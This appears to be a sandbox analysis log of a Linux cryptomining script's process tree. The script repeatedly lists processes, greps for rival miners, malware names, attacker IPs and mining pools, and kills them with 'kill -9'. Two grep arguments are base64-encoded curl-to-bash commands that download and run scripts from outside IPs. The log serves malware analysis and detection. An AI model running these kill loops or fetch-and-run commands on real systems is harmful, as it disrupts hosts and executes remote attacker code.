/usr/bin/awkawk "{print \$2}"2⤵PID:1092
-
-
/bin/grepgrep http_0xCC0322⤵PID:1091
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1093
-
-
/bin/grepgrep -v grep2⤵PID:1090
-
-
/bin/psps aux2⤵
- Reads runtime system information
PID:1089
-
-
/bin/grepgrep http_0xCC0332⤵PID:1096
-
-
/bin/grepgrep -v grep2⤵PID:1095
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1094
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1098
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1097
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1103
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1102
-
-
/bin/grepgrep C4iLM4L2⤵PID:1101
-
-
/bin/grepgrep -v grep2⤵PID:1100
-
-
/bin/psps aux2⤵PID:1099
-
-
/bin/grepgrep aziplcr72qjhzvin2⤵
- System Network Configuration Discovery
PID:1106
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1107
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1108
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1104
-
-
/bin/grepgrep -v grep2⤵PID:1105
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1112
-
-
/bin/grepgrep -v grep2⤵PID:1110
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1109
-
-
/usr/bin/awkawk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"2⤵PID:1111
-
-
/bin/grepgrep /boot/vmlinuz2⤵PID:1115
-
-
/bin/grepgrep -v grep2⤵PID:1114
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1117
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1113
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1116
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1121
-
-
/bin/grepgrep i4b503a52cc52⤵PID:1120
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1122
-
-
/bin/grepgrep -v grep2⤵PID:1119
-
-
/bin/psps aux2⤵
- Reads runtime system information
PID:1118
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1126
-
-
/bin/grepgrep dgqtrcst23rtdi3ldqk322j22⤵PID:1125
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1127
-
-
/bin/grepgrep -v grep2⤵PID:1124
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1123
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1131
-
-
/bin/grepgrep 2g0uv7npuhrlatd2⤵PID:1130
-
-
/bin/grepgrep -v grep2⤵PID:1129
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1132
-
-
/bin/psps aux2⤵PID:1128
-
-
/bin/grepgrep nqscheduler2⤵PID:1135
-
-
/bin/grepgrep -v grep2⤵PID:1134
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1136
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1137
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1133
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1141
-
-
/bin/grepgrep rkebbwgqpl4npmm2⤵PID:1140
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1142
-
-
/bin/grepgrep -v grep2⤵PID:1139
-
-
/bin/psps aux2⤵PID:1138
-
-
/bin/grepgrep -v aux2⤵PID:1145
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1148
-
-
/usr/bin/awkawk "\$3>10.0{print \$2}"2⤵PID:1147
-
-
/bin/grepgrep -v grep2⤵PID:1144
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1143
-
-
/bin/grepgrep "]"2⤵PID:1146
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1152
-
-
/bin/grepgrep 2fhtu70teuhtoh78jc5s2⤵PID:1151
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1153
-
-
/bin/grepgrep -v grep2⤵PID:1150
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1149
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1158
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1157
-
-
/bin/grepgrep 0kwti6ut420t2⤵PID:1156
-
-
/bin/grepgrep -v grep2⤵PID:1155
-
-
/bin/psps aux2⤵PID:1154
-
-
/bin/grepgrep 44ct7udt0patws3agkdfqnjm2⤵PID:1161
-
-
/bin/grepgrep -v grep2⤵PID:1160
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1163
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1159
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1162
-
-
/bin/grepgrep -v -2⤵PID:1167
-
-
/bin/grepgrep -v grep2⤵PID:1165
-
-
/bin/grepgrep -v _2⤵PID:1168
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1164
-
-
/bin/grepgrep -v /2⤵PID:1166
-
-
/usr/bin/awkawk "length(\$11)>19{print \$2}"2⤵PID:1169
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1170
-
-
/bin/grepgrep -v grep2⤵PID:1173
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1175
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1176
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1172
-
-
/bin/grepgrep "\\[^"2⤵PID:1174
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1182
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1181
-
-
/bin/grepgrep rsync2⤵PID:1180
-
-
/bin/grepgrep -v grep2⤵PID:1179
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1178
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1188
-
-
/bin/grepgrep -v grep2⤵PID:1186
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1189
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1185
-
-
/bin/grepgrep watchd0g2⤵PID:1187
-
-
/bin/grepgrep -v grep2⤵PID:1192
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1191
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1195
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1194
-
-
/bin/egrepegrep "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:1193
-
-
/usr/local/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:1193
-
-
/usr/local/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:1193
-
-
/usr/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:1193
-
-
/usr/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:1193
-
-
/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:1193
-
-
/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:1193
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1200
-
-
/bin/grepgrep 158.69.133.18:82202⤵PID:1199
-
-
/bin/grepgrep -v grep2⤵PID:1198
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1201
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1197
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1207
-
-
/bin/grepgrep /tmp/java2⤵PID:1206
-
-
/bin/grepgrep -v grep2⤵PID:1205
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1204
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1208
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1215
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1214
-
-
/bin/grepgrep gitee.com2⤵PID:1213
-
-
/bin/grepgrep -v grep2⤵PID:1212
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1211
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1220
-
-
/bin/grepgrep /tmp/java2⤵PID:1219
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1221
-
-
/bin/grepgrep -v grep2⤵PID:1218
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1217
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1227
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1226
-
-
/bin/grepgrep 104.248.4.1622⤵PID:1225
-
-
/bin/grepgrep -v grep2⤵PID:1224
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1223
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1233
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1234
-
-
/bin/grepgrep 89.35.39.782⤵PID:1232
-
-
/bin/grepgrep -v grep2⤵PID:1231
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1230
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1240
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1241
-
-
/bin/grepgrep -v grep2⤵PID:1238
-
-
/bin/psps aux2⤵PID:1237
-
-
/bin/grepgrep /dev/shm/z3.sh2⤵PID:1239
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1246
-
-
/bin/grepgrep kthrotlds2⤵PID:1245
-
-
/bin/grepgrep -v grep2⤵PID:1244
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1247
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1243
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1252
-
-
/bin/grepgrep ksoftirqds2⤵PID:1251
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1253
-
-
/bin/grepgrep -v grep2⤵PID:1250
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1249
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1259
-
-
/bin/grepgrep netdns2⤵PID:1258
-
-
/bin/grepgrep -v grep2⤵PID:1257
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1256
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1260
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1265
-
-
/bin/grepgrep watchdogs2⤵PID:1264
-
-
/bin/grepgrep -v grep2⤵PID:1263
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1262
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1266
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1271
-
-
/bin/grepgrep kdevtmpfsi2⤵PID:1270
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1272
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1268
-
-
/bin/grepgrep -v grep2⤵PID:1269
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1278
-
-
/bin/grepgrep -v grep2⤵PID:1276
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1279
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1275
-
-
/bin/grepgrep kinsing2⤵PID:1277
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1285
-
-
/bin/grepgrep redis22⤵PID:1284
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1286
-
-
/bin/grepgrep -v grep2⤵PID:1283
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1282
-
-
/bin/grepgrep " ps"2⤵PID:1291
-
-
/bin/grepgrep -v aux2⤵PID:1290
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1294
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1288
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1292
-
-
/bin/grepgrep -v grep2⤵PID:1289
-
-
/bin/grepgrep sync_supers2⤵PID:1298
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1296
-
-
/bin/grepgrep -v grep2⤵PID:1297
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1300
-
-
/usr/bin/cutcut -c 9-152⤵PID:1299
-
-
/usr/bin/cutcut -c 9-152⤵PID:1305
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1306
-
-
/bin/grepgrep -v grep2⤵PID:1303
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1302
-
-
/bin/grepgrep cpuset2⤵PID:1304
-
-
/bin/grepgrep "x]"2⤵PID:1310
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1311
-
-
/bin/grepgrep -v grep2⤵PID:1308
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1312
-
-
/bin/grepgrep -v aux2⤵PID:1309
-
-
/bin/psps aux2⤵PID:1307
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1318
-
-
/bin/grepgrep -v grep2⤵PID:1314
-
-
/bin/grepgrep -v aux2⤵PID:1315
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1313
-
-
/bin/grepgrep "sh] <"2⤵PID:1316
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1317
-
-
/bin/grepgrep -v grep2⤵PID:1320
-
-
/bin/grepgrep -v aux2⤵PID:1321
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1324
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1323
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1319
-
-
/bin/grepgrep " \\[]"2⤵PID:1322
-
-
/bin/grepgrep -v grep2⤵PID:1326
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1325
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1328
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1329
-
-
/bin/grepgrep /tmp/l.sh2⤵PID:1327
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1333
-
-
/bin/grepgrep /tmp/zmcat2⤵PID:1332
-
-
/bin/grepgrep -v grep2⤵PID:1331
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1330
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1334
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1339
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1338
-
-
/bin/grepgrep hahwNEdB2⤵PID:1337
-
-
/bin/grepgrep -v grep2⤵PID:1336
-
-
/bin/psps aux2⤵
- Reads runtime system information
PID:1335
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1343
-
-
/bin/grepgrep CnzFVPLF2⤵PID:1342
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1344
-
-
/bin/grepgrep -v grep2⤵PID:1341
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1340
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1349
-
-
/bin/grepgrep -v grep2⤵PID:1346
-
-
/bin/psps aux2⤵PID:1345
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1348
-
-
/bin/grepgrep CvKzzZLs2⤵PID:1347
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1353
-
-
/bin/grepgrep aziplcr72qjhzvin2⤵
- System Network Configuration Discovery
PID:1352
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1354
-
-
/bin/grepgrep -v grep2⤵PID:1351
-
-
/bin/psps aux2⤵PID:1350
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1358
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1359
-
-
/bin/grepgrep /tmp/udevd2⤵PID:1357
-
-
/bin/grepgrep -v grep2⤵PID:1356
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1355
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1363
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1364
-
-
/bin/grepgrep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA2⤵PID:1362
-
-
/bin/grepgrep -v grep2⤵PID:1361
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1360
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1369
-
-
/bin/grepgrep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo2⤵PID:1367
-
-
/bin/grepgrep -v grep2⤵PID:1366
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1365
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1368
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1373
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1374
-
-
/bin/grepgrep sustse2⤵PID:1372
-
-
/bin/grepgrep -v grep2⤵PID:1371
-
-
/bin/psps aux2⤵PID:1370
-
-
/bin/grepgrep sustse32⤵PID:1377
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1378
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1379
-
-
/bin/grepgrep -v grep2⤵PID:1376
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1375
-
-
/bin/grepgrep wget2⤵PID:1383
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1384
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1385
-
-
/bin/grepgrep -v grep2⤵PID:1381
-
-
/bin/psps aux2⤵PID:1380
-
-
/bin/grepgrep mr.sh2⤵PID:1382
-
-
/bin/grepgrep curl2⤵PID:1389
-
-
/bin/grepgrep mr.sh2⤵PID:1388
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1390
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1391
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1386
-
-
/bin/grepgrep -v grep2⤵PID:1387
-
-
/bin/grepgrep 2mr.sh2⤵PID:1394
-
-
/bin/grepgrep -v grep2⤵PID:1393
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1396
-
-
/bin/grepgrep wget2⤵PID:1395
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1397
-
-
/bin/psps aux2⤵PID:1392
-
-
/bin/grepgrep 2mr.sh2⤵PID:1400
-
-
/bin/grepgrep curl2⤵PID:1401
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1402
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1403
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1398
-
-
/bin/grepgrep -v grep2⤵PID:1399
-
-
/bin/grepgrep wget2⤵PID:1407
-
-
/bin/grepgrep cr5.sh2⤵PID:1406
-
-
/bin/grepgrep -v grep2⤵PID:1405
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1408
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1409
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1404
-
-
/bin/grepgrep curl2⤵PID:1413
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1414
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1415
-
-
/bin/grepgrep -v grep2⤵PID:1411
-
-
/bin/grepgrep cr5.sh2⤵PID:1412
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1410
-
-
/bin/grepgrep -v grep2⤵PID:1417
-
-
/bin/grepgrep wget2⤵PID:1419
-
-
/bin/psps aux2⤵
- Reads runtime system information
PID:1416
-
-
/bin/grepgrep logo9.jpg2⤵PID:1418
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1421
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1420
-
-
/bin/grepgrep logo9.jpg2⤵PID:1424
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1426
-
-
/bin/grepgrep -v grep2⤵PID:1423
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1422
-
-
/bin/grepgrep curl2⤵PID:1425
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1427
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1428
-
-
/bin/grepgrep -v grep2⤵PID:1429
-
-
/bin/grepgrep j2.conf2⤵PID:1430
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1432
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1431
-
-
/bin/grepgrep wget2⤵PID:1436
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1437
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1438
-
-
/bin/grepgrep -v grep2⤵PID:1434
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1433
-
-
/bin/grepgrep luk-cpu2⤵PID:1435
-
-
/bin/grepgrep luk-cpu2⤵PID:1441
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1439
-
-
/bin/grepgrep curl2⤵PID:1442
-
-
/bin/grepgrep -v grep2⤵PID:1440
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1443
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1444
-
-
/bin/grepgrep wget2⤵PID:1448
-
-
/bin/grepgrep -v grep2⤵PID:1446
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1449
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1450
-
-
/bin/grepgrep ficov2⤵PID:1447
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1445
-
-
/bin/grepgrep curl2⤵PID:1454
-
-
/bin/grepgrep ficov2⤵PID:1453
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1455
-
-
/bin/grepgrep -v grep2⤵PID:1452
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1456
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1451
-
-
/bin/grepgrep wget2⤵PID:1460
-
-
/bin/grepgrep he.sh2⤵PID:1459
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1461
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1462
-
-
/bin/psps aux2⤵
- Reads runtime system information
PID:1457
-
-
/bin/grepgrep -v grep2⤵PID:1458
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1463
-
-
/bin/grepgrep -v grep2⤵PID:1464
-
-
/bin/grepgrep he.sh2⤵PID:1465
-
-
/bin/grepgrep curl2⤵PID:1466
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1468
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1467
-
-
/bin/grepgrep wget2⤵PID:1472
-
-
/bin/grepgrep miner.sh2⤵PID:1471
-
-
/bin/grepgrep -v grep2⤵PID:1470
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1474
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1473
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1469
-
-
/bin/grepgrep curl2⤵PID:1478
-
-
/bin/grepgrep miner.sh2⤵PID:1477
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1479
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1480
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1475
-
-
/bin/grepgrep -v grep2⤵PID:1476
-
-
/bin/grepgrep wget2⤵PID:1484
-
-
/bin/grepgrep nullcrew2⤵PID:1483
-
-
/bin/grepgrep -v grep2⤵PID:1482
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1485
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1486
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1481
-
-
/bin/grepgrep nullcrew2⤵PID:1489
-
-
/bin/grepgrep -v grep2⤵PID:1488
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1492
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1487
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1491
-
-
/bin/grepgrep curl2⤵PID:1490
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1496
-
-
/bin/grepgrep 107.174.47.1562⤵PID:1495
-
-
/bin/grepgrep -v grep2⤵PID:1494
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1493
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1497
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1501
-
-
/bin/grepgrep 83.220.169.2472⤵PID:1500
-
-
/bin/grepgrep -v grep2⤵PID:1499
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1502
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1498
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1507
-
-
/bin/grepgrep -v grep2⤵PID:1504
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1506
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1503
-
-
/bin/grepgrep 51.38.203.1462⤵PID:1505
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1511
-
-
/bin/grepgrep 144.217.45.452⤵PID:1510
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1512
-
-
/bin/grepgrep -v grep2⤵PID:1509
-
-
/bin/psps aux2⤵
- Reads runtime system information
PID:1508
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1516
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1517
-
-
/bin/grepgrep 107.174.47.1812⤵PID:1515
-
-
/bin/grepgrep -v grep2⤵PID:1514
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1513
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1521
-
-
/bin/grepgrep 176.31.6.162⤵PID:1520
-
-
/bin/grepgrep -v grep2⤵PID:1519
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1522
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1518
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1526
-
-
/bin/grepgrep -v grep2⤵PID:1524
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1527
-
-
/bin/psps auxf2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1523
-
-
/bin/grepgrep mine.moneropool.com2⤵PID:1525
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1532
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1531
-
-
/bin/grepgrep pool.t00ls.ru2⤵PID:1530
-
-
/bin/grepgrep -v grep2⤵PID:1529
-
-
/bin/psps auxf2⤵
- Reads runtime system information
PID:1528
-
-
/bin/grepgrep xmr.crypto-pool.fr:80802⤵PID:1535
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1536
-
-
/bin/psps auxf2⤵
- Reads CPU attributes
PID:1533
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1537
-
-
/bin/grepgrep -v grep2⤵PID:1534
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1541
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1542
-
-
/bin/grepgrep -v grep2⤵PID:1539
-
-
/bin/psps auxf2⤵PID:1538
-
-
/bin/grepgrep xmr.crypto-pool.fr:33332⤵PID:1540
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2B
